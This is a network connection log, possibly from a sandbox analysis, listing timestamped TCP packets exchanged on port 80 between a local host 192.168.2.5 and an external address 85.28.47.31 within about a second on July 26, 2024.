Jul 26, 2024 17:56:06.271414995 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.271436930 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.272350073 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.272362947 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.272375107 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.272384882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.272396088 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.272407055 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.272413969 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.272417068 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.272428036 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.272439957 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.272444010 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.272474051 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.272587061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.272598982 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.272612095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.272622108 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.272631884 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.272635937 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.272644043 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.272660971 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.272663116 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.272690058 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.272710085 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.274110079 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.274125099 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.274136066 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.274147034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.274158001 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.274171114 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.274180889 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.274185896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.274192095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.274202108 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.274208069 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.274245024 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.360838890 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.360861063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.360872030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.360940933 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.360982895 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.361124039 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.361135006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.361146927 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.361157894 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.361181021 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.361208916 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.361258030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.361269951 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.361279964 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.361306906 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.361315012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.361325979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.361336946 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.361345053 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.361347914 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.361360073 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.361382961 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.361408949 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.364006042 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.364027023 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.364038944 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.364052057 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.364062071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.364072084 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.364074945 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.364082098 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.364092112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.364103079 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.364105940 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.364113092 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.364123106 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.364134073 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.364144087 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.364154100 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.364166975 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.364172935 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.364178896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.364187956 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.364196062 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.364200115 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.364212990 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.364219904 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.364223003 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.364254951 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.364276886 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.364303112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.364315033 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.364324093 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.364334106 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.364343882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.364350080 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.364355087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.364365101 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.364377022 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.364387035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.364398003 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.364411116 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.364439964 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.364479065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.364531994 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.364557028 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.364569902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.364612103 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.364892006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.364911079 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.364923000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.364934921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.364944935 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.364974022 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.365010977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.365036011 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.365047932 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.365057945 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.365058899 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.365071058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.365082979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.365092039 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.365092039 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.365098000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.365109921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.365113974 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.365144014 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.365163088 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.365540981 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.365551949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.365561008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.365571976 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.365581989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.365592003 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.365597010 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.365603924 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.365628004 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.365652084 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.367551088 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.367599010 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.367614031 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.367634058 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.367660046 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.367728949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.367742062 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.367753983 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.367764950 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.367774010 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.367815971 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.367997885 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.368015051 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.368035078 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.368046045 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.368055105 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.368058920 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.368069887 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.368079901 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.368084908 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.368091106 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.368103027 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.368110895 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.368141890 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.368745089 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.368757963 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.368767977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.368773937 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.368784904 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.368796110 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.368802071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.368804932 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.368807077 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.368818998 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.368829966 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.368839979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.368844032 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.368849993 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.368864059 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.368870020 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.368876934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.368894100 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.368917942 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.369292974 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.369307041 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.369318962 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.369329929 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.369340897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.369347095 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.369353056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.369364023 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.369364023 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.369375944 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.369381905 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.369393110 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.369402885 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.369419098 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.369453907 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.900825977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.900845051 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.900857925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.900870085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.900880098 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.900888920 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.900901079 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.900904894 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.900912046 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.900922060 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.900932074 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.900943041 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.900953054 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.900964975 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.900968075 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.900974035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.900991917 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.901009083 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.901190042 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.901201963 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.901211023 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.901221991 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.901231050 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.901242018 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.901304960 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.901304960 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.901348114 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.901361942 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.901371956 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.901384115 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.901393890 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.901395082 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.901402950 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.901407957 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.901416063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.901424885 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.901429892 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.901431084 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.901463985 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.901473999 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.901482105 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.901489019 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.901499987 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.901510000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.901519060 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.901520014 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.901530981 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.901540041 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.901549101 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.901557922 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.901567936 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.901587009 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.901609898 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.901855946 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.901865959 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.901879072 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.901885033 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.901904106 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.901913881 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.901916027 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.901926041 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.901936054 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.901947021 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.901948929 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.901957035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.901967049 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.901972055 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.901978016 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.901988983 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.901993036 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.901999950 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.902010918 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.902020931 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.902029991 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.902029991 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.902031898 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.902043104 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.902056932 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.902079105 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.902093887 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.902853012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.902868986 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.902878046 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.902888060 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.902914047 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.902931929 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.902951956 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.902995110 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.907485008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.907567024 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.986855984 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.986890078 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.986902952 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.987030029 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.987041950 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.987117052 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.987118006 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.987118006 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.987389088 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.987391949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.987407923 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.987421036 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.987430096 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.987440109 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.987446070 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.987447023 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.987457037 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.987466097 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.987468004 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.987476110 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.987485886 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.987504005 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.987540007 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.987715006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.987725973 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.987735033 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.987744093 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.987754107 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.987773895 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.987807035 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.987807035 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.987972021 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.987982035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.987993002 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.988001108 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.988024950 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.988051891 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.988101006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.988157034 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.988239050 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.988251925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.988260984 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.988270998 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.988281012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.988290071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.988289118 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.988300085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.988310099 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.988320112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.988320112 CEST	49704	80	192.168.2.5	85.28.47.31
